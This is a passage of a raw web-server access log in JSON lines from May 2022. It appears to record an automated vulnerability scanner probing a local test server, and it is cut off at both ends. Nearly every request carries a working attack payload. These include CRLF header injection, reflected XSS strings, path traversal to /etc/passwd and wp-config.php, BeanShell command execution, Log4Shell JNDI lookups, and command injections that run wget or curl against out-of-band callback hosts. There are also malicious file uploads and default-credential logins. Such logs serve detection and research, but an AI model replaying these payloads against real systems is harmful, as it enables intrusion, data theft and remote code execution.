tion=crlfinjection&src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&target=%0D%0ASet-Cookie:crlfinjection=crlfinjection&to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&uri=%0D%0ASet-Cookie:crlfinjection=crlfinjection&url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&val=%0D%0ASet-Cookie:crlfinjection=crlfinjection&validate=%0D%0ASet-Cookie:crlfinjection=crlfinjection&view=%0D%0ASet-Cookie:crlfinjection=crlfinjection&window=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.217","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/deviceInfo?auth=YWRtaW46MTEK HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=feedwordpress%2Fsyndication.php&visibility=%22%3E%3Cimg+src%3D1+onerror%3Dalert%28document.domain%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.214","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:%0a%0dexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /iam/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.060","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E%3B HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.060","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /NON_EXISTING_PATH/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.062","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"{\x22username\x22:\x22${jndi:ldap://${hostName}.c9v8h8gsmpv8c1qg07h07x65gxnis8qnb.oast.fun}\x22,\x22password\x22:\x22admin\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /suite-api/api/auth/token/acquire HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.223","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"http://127.0.0.1/ui/", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.css?path=/etc&p.hits=full&p.limit=-1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"bsh.script=exec(\x22cat+/etc/passwd\x22);&bsh.servlet.output=raw","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /bsh.servlet.BshServlet HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.053","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/group/list HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?Test=%0D%0ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /includes/mysql2i/mysql2i.func.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.206","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/packages/security.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.063","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /car1/estimateresult/result?s=&serviceestimatekey=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.218","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dispatcher/invalidate.cache HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.064","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.064","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%0a%0dexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"browserTime=081119502020¤tTime=1597159205&expires=Wed%252C%2B12%2BAug%2B2020%2B15%253A20%253A05%2BGMT&Command=Submit&user=admin&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.222","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.084","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.084","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/version HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.084","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /embed.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.083","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /scripts/wa.exe?OK=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.078","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/users/search_authors HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.096","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servicedesk/customer/user/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.079","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-----------------------------350278735926454076983690555601\x0D\x0AContent-Disposition: form-data; name=\x22supported_type\x22\x0D\x0A\x0D\x0Atxt%\x0D\x0A-----------------------------350278735926454076983690555601\x0D\x0AContent-Disposition: form-data; name=\x22size_limit\x22\x0D\x0A\x0D\x0A5242880\x0D\x0A-----------------------------350278735926454076983690555601\x0D\x0AContent-Disposition: form-data; name=\x22action\x22\x0D\x0A\x0D\x0Adnd_codedropz_upload\x0D\x0A-----------------------------350278735926454076983690555601\x0D\x0AContent-Disposition: form-data; name=\x22type\x22\x0D\x0A\x0D\x0Aclick\x0D\x0A-----------------------------350278735926454076983690555601\x0D\x0AContent-Disposition: form-data; name=\x22upload-file\x22; filename=\x22297MTsQwkCJNG2AVv1VpoUfAJXp.txt%\x22\x0D\x0AContent-Type: application/x-httpd-php\x0D\x0A\x0D\x0ACVE-2020-12800-297MTsQwkCJNG2AVv1VpoUfAJXp\x0D\x0A-----------------------------350278735926454076983690555601--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.062","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"Command=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;wget http://c9v8h8gsmpv8c1qg07h0xgoddttyeewzu.oast.fun&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/system_log.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.064","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zabbix/setup.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.099","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /VisionHubWebApi/api/Login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.100","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"{\x22name\x22:\x22297MU3f1JZlWsK7k9Sd7S3AVTQF\x22,\x22basepath\x22:\x22\x22,\x22group_id\x22:\x22{{group_id}}\x22,\x22icon\x22:\x22code-o\x22,\x22color\x22:\x22cyan\x22,\x22project_type\x22:\x22private\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/project/add HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.099","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /vr2conf/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.236","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /app/config/security.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.082","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/api-browser/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.079","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /addons/phpmailer/phpmailer.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.106","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-login.php?redirect_to=http%3A%2F%2F%3F1%3C%2FsCripT%3E%3CsCripT%3Ealert%28document.domain%29%3C%2FsCripT%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.226","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"{\x22message\x22:\x22{\x5C\x22msg\x5C\x22:\x5C\x22method\x5C\x22,\x5C\x22method\x5C\x22:\x5C\x22livechat:loadHistory\x5C\x22,\x5C\x22params\x5C\x22:[{\x5C\x22token\x5C\x22:\x5C\x22cvenucleirocketchat\x5C\x22,\x5C\x22rid\x5C\x22:\x5C\x22GENERAL\x5C\x22}],\x5C\x22msg\x5C\x22:\x5C\x22123\x5C\x22}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/v1/method.callAnon/cve_exploit HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.221","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=heateor_sss_sharing_count&urls[%3Cimg%20src%3dx%20onerror%3dalert(document.domain)%3E]= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.075","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.074","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /help/english/index.html?javascript& HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.229","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servicedesk/customer/portal/10/user/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.062","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/297MTsQwkCJNG2AVv1VpoUfAJXp.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.065","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/Attitude/go.php?https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.066","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /solr/admin/cores?wt=json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.068","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"file_transfer=new&dir=%27Pa_Noteexpr%20curl%2bhttp%3a//c9v8h8gsmpv8c1qg07h0yp4guwmh4tnbh.oast.funPa_Note%27","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/file_transfer.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.064","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jwhmcs&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.063","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.212","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"{\x22user\x22:\x22admin\x22,\x22password\x22:\x22password\x22,\x22type\x22:\x22login\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ui/api/v1/ui/auth/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.067","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET 